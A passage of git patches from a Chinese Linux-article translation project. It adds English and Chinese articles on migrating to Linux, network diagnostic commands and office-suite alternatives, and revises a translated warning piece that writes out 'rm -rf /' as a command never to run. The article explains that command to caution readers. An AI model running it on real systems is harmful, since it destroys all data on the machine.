-stevenzdg988 translating!!
-
-Migrating to Linux: An Introduction
-======
-![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/migrating-to-linux.jpg?itok=sjcGK0SY)
-Computer systems running Linux are everywhere. Linux runs our Internet services, from Google search to Facebook, and more. Linux also runs in a lot of devices, including our smartphones, televisions, and even cars. Of course, Linux can also run on your desktop system. If you are new to Linux, or you would just like to try something different on your desktop computer, this series of guides will briefly cover the basics and help you in migrating to Linux from another system.
-
-Switching to a different operating system can be a challenge because every operating system provides a different way of doing things. What is second nature on one system can take frustrating time on another as we need to look up how to do things online or in books.
-
-### Vive la difference
-
-To getting started with Linux, one thing you'll likely notice is that Linux is packaged differently. In other operating systems, many things are bundled together and are just a part of the package. In Linux, however, each component is called out separately. For example, under Windows, the graphical interface is just a part of Windows. With Linux, you can choose from multiple graphical environments, like GNOME, KDE Plasma, Cinnamon, and MATE, to name a few.
-
-At a high level, a Linux installation includes the following things:
-
- 1. The kernel
-
- 2. System programs and files residing on disk
-
- 3. A graphical environment
-
- 4. A package manager
-
- 5. Applications
-
-
-
-
-### The Kernel
-
-The core of the operating system is called the kernel. The kernel is the engine under the hood. It allows multiple applications to run simultaneously, and it coordinates their access to common services and devices so everything runs smoothly.
-
-### System programs and files
-
-System programs reside on disk in a standard hierarchy of files and directories. These system programs and files include services (called daemons) that run in the background, utilities for various operations, configuration files, and log files.
-
-Instead of running inside the kernel, these system programs are applications that perform tasks for basic system operation -- for example, set the date and time and connect on the network so you can get on the Internet.
-
-Included here is the init program - the very first application that runs. This program is responsible to starting all the background services (like a web server), starting networking, and starting the graphical environment. This init program will launch other system programs as needed.
-
-Other system programs provide facilities for simple tasks like adding users and groups, changing your password, and configuring disks.
-
-### Graphical Environment
-
-The graphical environment is really just more system programs and files. The graphical environment provides the usual windows with menus, a mouse pointer, dialog boxes, status and indicators and more.
-
-Note that you aren't stuck with the graphical environment that was originally installed. You can change it out for others, if you like. Each graphical environment will have different features. Some look more like Apple OS X, some look more like Windows, and others are unique and don't try to mimic other graphical interfaces.
-
-### Package Manager
-
-The package manager used to be difficult for people to grasp coming from a different system, but nowadays there is a similar system that people are very familiar with -- the App Store. The packaging system is really an app store for Linux. Instead of installing this application from that web site, and the other application from a different site, you can use the package manager to select which applications you want. The package manager then installs the applications from a central repository of pre-built open source applications.
-
-### Applications
-
-Linux comes with many pre-installed applications. And you can get more from the package manager. Many of the applications are quite good, which others need work. Sometimes the same application will have different versions that run in Windows or Mac OS or Linux.
-
-For example, you can use Firefox browser and Thunderbird (for email). You can use LibreOffice as an alternative to Microsoft Office and run games through Valve's Steam program. You can even run some native Windows applications on Linux using WINE.
-
-### Installing Linux
-
-Your first step is typically to install a Linux distribution. You may have heard of Red Hat, Ubuntu, Fedora, Arch Linux, and SUSE, to name a few. These are different distributions of Linux.
-
-Without a Linux distribution, you would have to install each component separately. Many components are developed and provided by different groups of people, so to install each component separately would be a long, tedious task. Luckily, the people who build distros do this work for you. They grab all the components, build them, make sure they work together, and then package them up under a single installation.
-
-Various distributions may make different choices and use different components, but it's still Linux. Applications written to work in one distribution frequently run on other distributions just fine.
-
-If you are a Linux beginner and want to try out Linux, I recommend[ installing Ubuntu][1]. There are other distros you can look into as well: Linux Mint, Fedora, Debian, Zorin OS, elementary OS, and many more. In future articles, we will cover additional facets of a Linux system and provide more information on how to get started using Linux.
-
-Learn more about Linux through the free ["Introduction to Linux" ][2]course from The Linux Foundation and edX.
-
---------------------------------------------------------------------------------
-
-via: https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
-
-作者:[John Bonesio][a]
-译者:[译者ID](https://github.com/译者ID)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://www.linux.com/users/johnbonesio
-[1]:https://www.ubuntu.com/download/desktop
-[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From a4fc4b8523151aa9537f3c01fe60f618e47bd020 Mon Sep 17 00:00:00 2001
From: stevenzdg988
Date: Fri, 5 Jan 2018 22:32:22 +0800
Subject: [PATCH 027/371] Translated by stevenzdg988
---
...031 Migrating to Linux- An Introduction.md | 64 +++++++++++++++++++
1 file changed, 64 insertions(+)
create mode 100644 translated/tech/20171031 Migrating to Linux- An Introduction.md
diff --git a/translated/tech/20171031 Migrating to Linux- An Introduction.md b/translated/tech/20171031 Migrating to Linux- An Introduction.md
new file mode 100644
index 0000000000..6128c5ccd0
--- /dev/null
+++ b/translated/tech/20171031 Migrating to Linux- An Introduction.md
@@ -0,0 +1,64 @@
+
+迁移到 Linux :入门介绍
+======
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/migrating-to-linux.jpg?itok=sjcGK0SY)
+运行 Linux 的计算机系统遍布每个角落。Linux 运行着我们的互联网服务,从谷歌搜索到 Facebook,等等。Linux 也在很多设备上运行,包括我们的智能手机、电视,甚至汽车。当然,Linux 也可以运行在您的桌面系统上。如果您是 Linux 新手,或者您想在您的桌面计算机上尝试一些不同的东西,这个系列的指南将简要地介绍其基础知识,并帮助您从另一个系统迁移到 Linux。
+
+切换到不同的操作系统可能是一个挑战,因为每个操作系统都提供了不同的操作方法。在一个系统上习以为常的操作,到了另一个系统上可能就需要花费大量时间去网上或书本上查找怎样操作,这会让人沮丧。
+
+### 各有不同
+
+要开始使用 Linux,您可能会注意到,Linux 的打包方式不同。在其他操作系统中,许多组件被捆绑在一起,只是包的一部分。然而,在 Linux 中,每个组件都被分别调用。举个例子来说,在 Windows 下,图形界面只是操作系统的一部分。而在 Linux 下,您可以从多个图形环境中进行选择,比如 GNOME、KDE Plasma、Cinnamon 和 MATE 等。
+
+总体而言,一个 Linux 安装包括以下内容:
+ 1. 内核
+ 2. 系统程序和文件驻留在磁盘上
+ 3. 图形环境
+ 4. 包管理器
+ 5. 应用程序
+
+
+
+### 内核
+
+操作系统的核心称为内核。内核是引擎罩下的引擎。它允许多个应用程序同时运行,并协调它们对公共服务和设备的访问,从而使所有设备运行顺畅。
+### 系统程序和文件(系统)
+
+系统程序位于文件和目录的标准层次结构中的磁盘上。这些系统程序和文件包括后台运行的服务(称为守护进程)、各种操作的实用程序、配置文件和日志文件。
+
+这些系统程序不是在内核中运行,而是执行基本系统操作的应用程序——例如,设置日期和时间,并在网络上连接,这样你就可以上网了。
+
+这里也包含了初始化(init)程序——系统最先运行的应用程序。该程序负责启动所有后台服务(如 Web 服务器)、启动网络连接和启动图形环境。这个初始化(init)程序将根据需要启动其他系统程序。
+
+其他系统程序为简单的任务提供便利,比如添加用户和组、更改密码和配置磁盘。
+### 图形环境
+
+图形环境实际上只是更多的系统程序和文件。图形环境提供了常用的菜单窗口、鼠标指针、对话框、状态和指示器等。
+需要注意的是,您不必一直使用最初安装的图形环境。如果您愿意,可以把它换成其他的图形环境。每个图形环境都有不同的特性。有些看起来更像 Apple OS X,有些看起来更像 Windows,有些则是独一无二的,并不试图模仿其他的图形界面。
+### 包管理器
+
+包管理器在不同的系统中很难被我们把握,但是现在有一个人们非常熟悉的类似的系统——应用程序商店。软件包系统实际上是为 Linux 存储应用程序。您可以使用包管理器来选择您想要的应用程序,而不是从该web站点安装这个应用程序,以及从另一个站点来安装其他应用程序。然后,包管理器从预先构建的开放源码应用程序的中心知识库安装应用程序。
+### 应用程序
+
+Linux 附带了许多预装的应用程序。您还可以从包管理器获得更多。许多应用程序相当不错,其它的则还有待改进。有时,同一个应用程序在 Windows、Mac OS 或 Linux 上会有不同的版本。
+例如,您可以使用 Firefox 浏览器和 Thunderbird (用于电子邮件)。您可以使用 LibreOffice 作为 Microsoft Office 的替代品,并通过 Valve's Steam 程序运行游戏。您甚至可以在 Linux 上使用 WINE 来运行一些本地 Windows 应用程序。
+### 安装 Linux
+
+第一步通常是安装Linux发行版。你可能听说过 Red Hat、Ubuntu、Fedora、Arch Linux 和 SUSE,等等。这些是 Linux 的不同发行版。
+如果没有 Linux 发行版,则必须分别安装每个组件。许多组件是由不同人群开发和提供的,因此单独安装每个组件将是一项冗长而乏味的任务。幸运的是,构建 ```distros``` 的人会为您做这项工作。他们抓取所有的组件,构建它们,确保它们一起工作,然后将它们打包在一个单独的安装进程中。
+各种发行版可能会做出不同的选择,使用不同的组件,但它仍然是 Linux。应用程序被开发在一个发行版中却经常在其他发行版上运行的很好。
+如果你是一个Linux初学者,想尝试Linux,我推荐[Ubuntu 安装][1]。还有其他的发行版也可以尝试: Linux Mint、Fedora、Debian、Zorin OS、Elementary OS等等。在以后的文章中,我们将介绍 Linux 系统的其他方面,并提供关于如何开始使用 Linux 的更多信息。
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
+
+作者:[John Bonesio][a]
+译者:[stevenzdg988](https://github.com/stevenzdg988)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.linux.com/users/johnbonesio
+[1]:https://www.ubuntu.com/download/desktop
+[2]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From 0a7cf345dac61ecad8b92bfc98e8ea74c59644b7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:32:31 +0800
Subject: [PATCH 028/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20More=20ways=20to?=
=?UTF-8?q?=20examine=20network=20connections=20on=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...to examine network connections on Linux.md | 209 ++++++++++++++++++
1 file changed, 209 insertions(+)
create mode 100644 sources/tech/20171019 More ways to examine network connections on Linux.md
diff --git a/sources/tech/20171019 More ways to examine network connections on Linux.md b/sources/tech/20171019 More ways to examine network connections on Linux.md
new file mode 100644
index 0000000000..1583882158
--- /dev/null
+++ b/sources/tech/20171019 More ways to examine network connections on Linux.md
@@ -0,0 +1,209 @@
+More ways to examine network connections on Linux
+======
+The ifconfig and netstat commands are incredibly useful, but there are many other commands that can help you see what's up with your network on Linux systems. Today's post explores some very handy commands for examining network connections.
+
+### ip command
+
+The **ip** command shows a lot of the same kind of information that you'll get when you use **ifconfig**. Some of the information is in a different format - e.g., "192.168.0.6/24" instead of "inet addr:192.168.0.6 Bcast:192.168.0.255" and ifconfig is better for packet counts, but the ip command has many useful options.
+
+First, here's the **ip a** command listing information on all network interfaces.
+```
+$ ip a
+1: lo: mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
+ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
+ inet 127.0.0.1/8 scope host lo
+ valid_lft forever preferred_lft forever
+ inet6 ::1/128 scope host
+ valid_lft forever preferred_lft forever
+2: eth0: mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
+ link/ether 00:1e:4f:c8:43:fc brd ff:ff:ff:ff:ff:ff
+ inet 192.168.0.6/24 brd 192.168.0.255 scope global eth0
+ valid_lft forever preferred_lft forever
+ inet6 fe80::21e:4fff:fec8:43fc/64 scope link
+ valid_lft forever preferred_lft forever
+
+```
+
+If you only want to see the addresses assigned to your network interfaces, you can limit the output with **grep**.
+```
+$ ip a | grep inet
+ inet 127.0.0.1/8 scope host lo
+ inet6 ::1/128 scope host
+ inet 192.168.0.6/24 brd 192.168.0.255 scope global eth0
+ inet6 fe80::21e:4fff:fec8:43fc/64 scope link
+
+```
+
+You can get a glimpse of your default route using a command like this:
+```
+$ ip route show
+default via 192.168.0.1 dev eth0
+192.168.0.0/24 dev eth0 proto kernel scope link src 192.168.0.6
+
+```
+
+In this output, you can see that the default gateway is 192.168.0.1 through eth0 and that the local network is the fairly standard 192.168.0.0/24.
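+
+If you want to see which route would be used to reach one particular destination, `ip route get` (shown here with an arbitrary public address) will report it; the output should show the same gateway, interface, and source address as above:
+```
+$ ip route get 8.8.8.8
+
+```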
+
+You can also use the **ip** command to bring network interfaces up and shut them down.
+```
+$ sudo ip link set eth1 up
+$ sudo ip link set eth1 down
+
+```
+
+### ethtool command
+
+Another very useful tool for examining networks is **ethtool**. This command provides a lot of descriptive data on network interfaces.
+```
+$ ethtool eth0
+Settings for eth0:
+ Supported ports: [ TP ]
+ Supported link modes: 10baseT/Half 10baseT/Full
+ 100baseT/Half 100baseT/Full
+ 1000baseT/Full
+ Supported pause frame use: No
+ Supports auto-negotiation: Yes
+ Advertised link modes: 10baseT/Half 10baseT/Full
+ 100baseT/Half 100baseT/Full
+ 1000baseT/Full
+ Advertised pause frame use: No
+ Advertised auto-negotiation: Yes
+ Speed: 100Mb/s
+ Duplex: Full
+ Port: Twisted Pair
+ PHYAD: 1
+ Transceiver: internal
+ Auto-negotiation: on
+ MDI-X: on (auto)
+Cannot get wake-on-lan settings: Operation not permitted
+ Current message level: 0x00000007 (7)
+ drv probe link
+ Link detected: yes
+
+```
+
+You can also use the **ethtool** command to examine ethernet driver settings.
+```
+$ ethtool -i eth0
+driver: e1000e
+version: 3.2.6-k
+firmware-version: 1.4-0
+expansion-rom-version:
+bus-info: 0000:00:19.0
+supports-statistics: yes
+supports-test: yes
+supports-eeprom-access: yes
+supports-register-dump: yes
+supports-priv-flags: no
+
+```
+
+The autonegotiation details can be displayed with a command like this:
+```
+$ ethtool -a eth0
+Pause parameters for eth0:
+Autonegotiate: on
+RX: on
+TX: on
+
+```
+
+### traceroute command
+
+The **traceroute** command displays routing pathways. It works by using the TTL (time to live) field in the packet header in a series of packets to capture the path that packets take and how long they take to get from one hop to the next. Traceroute's output helps to gauge the health of network connections, since some routes might take much longer to reach the eventual destination.
+```
+$ sudo traceroute world.std.com
+traceroute to world.std.com (192.74.137.5), 30 hops max, 60 byte packets
+ 1 192.168.0.1 (192.168.0.1) 3.691 ms 3.678 ms 3.665 ms
+ 2 10.224.64.1 (10.224.64.1) 26.273 ms 27.354 ms 28.574 ms
+ 3 10.20.0.33 (10.20.0.33) 28.293 ms 30.625 ms 33.959 ms
+ 4 10.20.0.226 (10.20.0.226) 36.807 ms 37.868 ms 37.857 ms
+ 5 204.111.0.132 (204.111.0.132) 38.256 ms 39.091 ms 40.429 ms
+ 6 ash-b1-link.telia.net (80.239.161.69) 41.612 ms 28.214 ms 29.573 ms
+ 7 xe-1-3-1.er1.iad10.us.zip.zayo.com (64.125.13.157) 30.429 ms 27.915 ms 29.065 ms
+ 8 ae6.cr1.dca2.us.zip.zayo.com (64.125.20.117) 31.353 ms 32.413 ms 33.821 ms
+ 9 ae27.cs1.dca2.us.eth.zayo.com (64.125.30.246) 43.474 ms 44.519 ms 46.037 ms
+10 ae4.cs1.lga5.us.eth.zayo.com (64.125.29.202) 48.107 ms 48.960 ms 50.024 ms
+11 ae8.mpr3.bos2.us.zip.zayo.com (64.125.30.139) 51.626 ms 51.200 ms 39.283 ms
+12 64.124.51.229.t495-rtr.towerstream.com (64.124.51.229) 40.233 ms 41.295 ms 39.651 ms
+13 69.38.149.18 (69.38.149.18) 44.955 ms 46.210 ms 55.673 ms
+14 64.119.137.154 (64.119.137.154) 56.076 ms 56.064 ms 56.052 ms
+15 world.std.com (192.74.137.5) 63.440 ms 63.886 ms 63.870 ms
+
+```
+
+### tcptraceroute command
+
+The **tcptraceroute** command does basically the same thing as traceroute except that it is able to bypass the most common firewall filters. As the command's man page explains, tcptraceroute sends out TCP SYN packets instead of UDP or ICMP ECHO packets, thus making it less susceptible to being blocked.
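+
+Its basic usage mirrors traceroute: you give it a destination and, optionally, a TCP port to probe (port 80 is the usual default), for example:
+```
+$ sudo tcptraceroute world.std.com 80
+
+```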
+
+### tcpdump command
+
+The **tcpdump** command allows you to capture network packets for later analysis. With the -D option, it lists available interfaces.
+```
+$ tcpdump -D
+1.eth0 [Up, Running]
+2.any (Pseudo-device that captures on all interfaces) [Up, Running]
+3.lo [Up, Running, Loopback]
+4.nflog (Linux netfilter log (NFLOG) interface)
+5.nfqueue (Linux netfilter queue (NFQUEUE) interface)
+6.usbmon1 (USB bus number 1)
+7.usbmon2 (USB bus number 2)
+8.usbmon3 (USB bus number 3)
+9.usbmon4 (USB bus number 4)
+10.usbmon5 (USB bus number 5)
+11.usbmon6 (USB bus number 6)
+12.usbmon7 (USB bus number 7)
+
+```
+
+The -v (verbose) option controls how much detail you will see -- more v's, more details, but more than three v's doesn't add anything more.
+```
+$ sudo tcpdump -vv host 192.168.0.32
+tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
+20:26:31.321816 IP (tos 0x10, ttl 64, id 22411, offset 0, flags [DF], proto TCP (6), length 184)
+ 192.168.0.6.ssh > 192.168.0.32.57294: Flags [P.], cksum 0x8221 (incorrect -> 0x0254), seq 3891093411:3891093555, ack 2388988308, win 329, length 144
+20:26:31.321984 IP (tos 0x10, ttl 64, id 22412, offset 0, flags [DF], proto TCP (6), length 200)
+ 192.168.0.6.ssh > 192.168.0.32.57294: Flags [P.], cksum 0x8231 (incorrect -> 0x3db0), seq 144:304, ack 1, win 329, length 160
+20:26:31.323791 IP (tos 0x0, ttl 128, id 20259, offset 0, flags [DF], proto TCP (6), length 40)
+ 192.168.0.32.57294 > 192.168.0.6.ssh: Flags [.], cksum 0x643d (correct), seq 1, ack 304, win 385, length 0
+20:26:31.383954 IP (tos 0x10, ttl 64, id 22413, offset 0, flags [DF], proto TCP (6), length 248)
+...
+
+```
+
+Expect to see a _lot_ of output when you run commands like this one.
+
+The command below captures packets sent from a specific host over eth0. The -w option identifies the file that will hold the captured packets, while the -c option limits the capture; in this example, we've asked for only 11 packets.
+```
+$ sudo tcpdump -c 11 -i eth0 src 192.168.0.32 -w packets.pcap
+tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
+11 packets captured
+11 packets received by filter
+0 packets dropped by kernel
+
+```
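+
+The saved file can be read back later with tcpdump itself using the -r option (adding -nn skips name and port lookups), or opened in a tool like Wireshark for a closer look:
+```
+$ tcpdump -nn -r packets.pcap
+
+```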
+
+### arp command
+
+The arp command maps IPv4 addresses to hardware addresses. The information provided can also be used to identify the systems to some extent, since the network adaptors in use can tell you something about the systems using them. The second MAC address below, starting with f8:8e:85, is easily identified as a Comtrend router.
+```
+$ arp -a
+? (192.168.0.12) at b0:c0:90:3f:10:15 [ether] on eth0
+? (192.168.0.1) at f8:8e:85:35:7f:b9 [ether] on eth0
+
+```
+
+The first line above shows the MAC address for the network adaptor on the system itself. This network adaptor appears to have been manufactured by Chicony Electronics in Taiwan. You can look up MAC address associations fairly easily on the web with tools such as this one from Wireshark -- https://www.wireshark.org/tools/oui-lookup.html
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.networkworld.com/article/3233306/linux/more-ways-to-examine-network-connections-on-linux.html
+
+作者:[Sandra Henry-Stocker][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/
From f888157f796b08bad0198d66a80f0a5e95a985c6 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 22:34:22 +0800
Subject: [PATCH 029/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=206=20Best=20Open?=
=?UTF-8?q?=20Source=20Alternatives=20to=20Microsoft=20Office=20for=20Linu?=
=?UTF-8?q?x?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ernatives to Microsoft Office for Linux.md | 112 ++++++++++++++++++
1 file changed, 112 insertions(+)
create mode 100644 sources/tech/20120624 6 Best Open Source Alternatives to Microsoft Office for Linux.md
diff --git a/sources/tech/20120624 6 Best Open Source Alternatives to Microsoft Office for Linux.md b/sources/tech/20120624 6 Best Open Source Alternatives to Microsoft Office for Linux.md
new file mode 100644
index 0000000000..400a800899
--- /dev/null
+++ b/sources/tech/20120624 6 Best Open Source Alternatives to Microsoft Office for Linux.md
@@ -0,0 +1,112 @@
+6 Best Open Source Alternatives to Microsoft Office for Linux
+======
+**Brief: Looking for Microsoft Office in Linux? Here are the best free and open source alternatives to Microsoft Office for Linux.**
+
+Office suites are a mandatory part of any operating system. It is difficult to imagine using a desktop OS without office software. While Windows has the MS Office suite and Mac OS X has its own iWork, along with lots of other office suites meant especially for those operating systems, Linux too has some arrows in its quiver.
+
+In this article, I list the best Microsoft Office alternatives for Linux.
+
+## Best open source alternatives to Microsoft Office for Linux
+
+![Best Microsoft office alternatives for Linux][1]
+
+Before we see the MS Office alternatives, let's first see what you look for in a decent office suite:
+
+ * Word processor
+ * Spreadsheet
+ * Presentation
+
+
+
+I know that Microsoft Office offers a lot more than these three tools but in reality, you would be using these three tools most of the time. It's not that open source office suites are restricted to only these three products. Some of them offer additional tools as well, but our focus will be on the above-mentioned tools.
+
+Let's see what office suites for Linux we have here:
+
+### 6. Apache OpenOffice
+
+![OpenOffice Logo][2]
+
+[Apache OpenOffice][3], or simply OpenOffice, has a history of name/owner changes. It began as StarOffice, which Sun Microsystems acquired in 1999 and later released as OpenOffice to pit it against MS Office as a free and open source alternative. When Oracle bought Sun in 2010, it discontinued the development of OpenOffice after a year. And finally it was Apache who adopted it, and it is now known as Apache OpenOffice.
+
+Apache OpenOffice is available for a number of platforms that includes Linux, Windows, Mac OS X, Unix, BSD. It also includes support for MS Office files apart from its own OpenDocument format. The office suite contains the following applications: Writer, Calc, Impress, Base, Draw, Math.
+
+[Installing OpenOffice][4] is a pain as it doesn't provide a decent installer. Also, there are rumors that [OpenOffice development might have been stalled][5]. These two are the main reasons why I wouldn't recommend it. I listed it here more for historical purposes.
+
+### 5. Feng Office
+
+![Feng Office logo][6]
+
+[Feng Office][7] was previously known as OpenGoo. It is not your regular office suite. It is entirely focused on being an online office suite like Google Docs. In other words, it's an open source [collaboration platform][8].
+
+There is no desktop version available so if you are looking to using it on a single Linux desktop, you are out of luck here. On the other hand, if you have a small business, an institution or some other organization, you may try to deploy it on the local server.
+
+### 4. Siag Office
+
+![SIAG Office logo][9]
+
+[Siag][10] is an extremely lightweight office suite for Unix-like systems that can run on a 16 MB system. Since it is very lightweight, it lacks many of the features found in a standard office suite. But small is beautiful, ain't it? It has all the necessary functions of an office suite that could "just work" on [lightweight Linux distributions][11]. It comes by default in [Damn Small Linux][12].
+
+### 3. Calligra Suite
+
+![Calligra free and Open Source office logo][13]
+
+[Calligra][14], previously known as KOffice, is the default office suite in KDE. It is available for Linux and FreeBSD systems, with support for Mac OS X and Windows. It was also [launched for Android][15], but unfortunately it's not available for Android anymore. It has all the applications needed for an office suite, along with some extra applications such as Flow for flow charts and Plan for project management.
+
+Calligra has generated quite a buzz with its recent developments and may be seen as an [alternative to LibreOffice][16].
+
+### 2. ONLYOFFICE
+
+![ONLYOFFICE is Linux alternative to Microsoft Office][17]
+
+A relatively new player in the market, [ONLYOFFICE][18] is an office suite that focuses more on the [collaborative][8] part. Enterprises (and even individuals) can deploy it on their own servers to get a Google Docs-like collaborative office suite.
+
+Don't worry. You don't have to bother about installing it on a server. There is a free and [open source desktop version of ONLYOFFICE][19]. You can even get .deb and .rpm binaries to easily install it on your desktop Linux system.
+
+### 1. LibreOffice
+
+![LibreOffice logo][20]
+
+When Oracle decided to discontinue the development of OpenOffice, it was [The Document Foundation][21] who forked it and gave us what is known as [LibreOffice][22]. Since then, a number of Linux distributions have replaced OpenOffice with LibreOffice as their default office application.
+
+It is available for Linux, Windows and Mac OS X, which makes it easy to use in a cross-platform environment. Like Apache OpenOffice, it supports MS Office files in addition to its own OpenDocument format, and it contains the same set of applications as Apache OpenOffice.
+
+You can also use LibreOffice as a collaborative platform using [Collabora Online][23]. Basically, LibreOffice is a complete package and undoubtedly the best **Microsoft Office alternative for Linux** , Windows and macOS.
+
+## What do you think?
+
+I hope these open source alternatives to Microsoft Office save you money. Which open source productivity suite do you use?
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/best-free-open-source-alternatives-microsoft-office/
+
+作者:[Abhishek Prakash][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/abhishek/
+[1]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/best-open-source-alternatives-ms-office-800x450.jpg
+[2]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/open-office-logo-wide.jpg
+[3]:http://www.openoffice.org/
+[4]:https://itsfoss.com/install-openoffice-ubuntu-linux/
+[5]:https://itsfoss.com/openoffice-shutdown/
+[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/feng-office-logo-wide-800x240.jpg
+[7]:http://www.fengoffice.com/web/index.php?lang=en
+[8]:https://en.wikipedia.org/wiki/Collaborative_software
+[9]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/siag-office-logo-wide-800x240.jpg
+[10]:http://siag.nu/
+[11]:https://itsfoss.com/lightweight-linux-beginners/
+[12]:http://www.damnsmalllinux.org/
+[13]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/calligra-office-logo-wide-800x240.jpg
+[14]:http://www.calligra.org/
+[15]:https://itsfoss.com/calligra-android-app-coffice/
+[16]:http://maketecheasier.com/is-calligra-a-great-alternative-to-libreoffice/2012/06/18
+[17]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/only-office-logo-wide-800x240.png
+[18]:https://www.onlyoffice.com/
+[19]:https://itsfoss.com/review-onlyoffice-desktop-editors-linux/
+[20]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2012/06/LibreOffice-logo-wide-800x240.jpg
+[21]:http://www.documentfoundation.org/
+[22]:http://www.libreoffice.org/
+[23]:https://www.collaboraoffice.com/collabora-online/
From d23b305ba2990e2dd7c64b8a091bd473b3e7942f Mon Sep 17 00:00:00 2001
From: wxy
Date: Fri, 5 Jan 2018 23:31:15 +0800
Subject: [PATCH 030/371] PRF:20171219 The Linux commands you should NEVER
use.md
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
@CYLeft 翻译的不错,更细心些会更佳
---
...The Linux commands you should NEVER use.md | 144 +++++++++---------
1 file changed, 71 insertions(+), 73 deletions(-)
diff --git a/translated/tech/20171219 The Linux commands you should NEVER use.md b/translated/tech/20171219 The Linux commands you should NEVER use.md
index d47d815f02..0d4ea548a4 100644
--- a/translated/tech/20171219 The Linux commands you should NEVER use.md
+++ b/translated/tech/20171219 The Linux commands you should NEVER use.md
@@ -1,168 +1,166 @@
-一些您不应该使用的 Linux 命令
+绝不要用的 Linux 命令!
======
-当然,除非你想干掉你的机器。
-蜘蛛侠有这样的一句信条, "权力越大,责任越大。" 对于 Linux 系统管理员们来说,这也是一种适合采用的明智态度。
+![](https://www.hpe.com/content/dam/hpe/insights/articles/2017/12/the-linux-commands-you-should-never-use/featuredStory/The-Linux-commands-you-should-NEVER-use-1879.jpg.transform/nxt-1043x496-crop/image.jpeg)
-不,真的,真心感谢 DevOps 的沟通协作和云编排技术,让一个 Linux 管理员不仅能掌控一台服务器,甚者能控制成千上万台服务器实例。只需要一个愚蠢的举动,你甚至可以毁掉一个价值数十亿美元的企业,比如 [not patching Apache Struts][1] 。
+**当然,除非你想干掉你的机器。**
-如果不能停留在安全补丁之上,将会带来一个远超过系统管理员工资等级的战略性业务问题。这里就有一些足以攻击 Linux 服务器的方式掌握在系统管理员手中。很容易想象到,只有新手才会犯这些错误,但是,我们需要了解的更多。
+蜘蛛侠有这样的一句信条,“权力越大,责任越大。” 对于 Linux 系统管理员们来说,这也是一种应当采用的明智态度。
+
+不,真的,真心感谢 DevOps 的沟通协作和云编排技术,让一个 Linux 管理员不仅能掌控一台服务器,甚至能控制成千上万台服务器实例。只需要一个愚蠢的举动,你甚至可以毁掉一个价值数十亿美元的企业,比如 [没有打补丁的 Apache Struts][1]。
+
+如果不能及时跟上安全补丁,就会酿成远超系统管理员工资水平的战略性业务问题。不过,还有一些足以搞死 Linux 服务器的简单方式,牢牢掌握在系统管理员手中。很容易以为只有新手才会犯这些错误,但我们需要了解的还不止这些。
下列是一些著名的命令,任何拥有 root 权限的用户都能借助它们对服务器造成严重破坏。
-警告:千万不要在生产环境运行这些命令,它们会危害你的系统。不要在家里尝试,也不要在办公室里测试。
+**警告:千万不要在生产环境运行这些命令,它们会危害你的系统。不要在家里尝试,也不要在办公室里测试。**
那么,继续!
### rm -rf /
-想要干脆利落的毁掉一个 Linux 系统吗?你无法超越这个被誉为“史上最糟糕”的经典,他能删除一切,我说的是,能删除所有存在你系统里的内容!
+想要干脆利落的毁掉一个 Linux 系统吗?你无法超越这个被誉为“史上最糟糕”的经典,它能删除一切,我说的是,能删除所有存在你系统里的内容!
-和大多数 [Linux commands][2]一样,‘rm’这个核心指令使用起来非常方便。即便是最顽固的文件他也能帮你删除。结合起后面两个参数理解‘rm’指令时,你很容易陷入沉思:‘-r’,强制递归删除所有子目录,‘-f’,无需确认,强制删除所有只读文件。如果你在根目录运行这条指令,将清除整个驱动器上的所有数据。
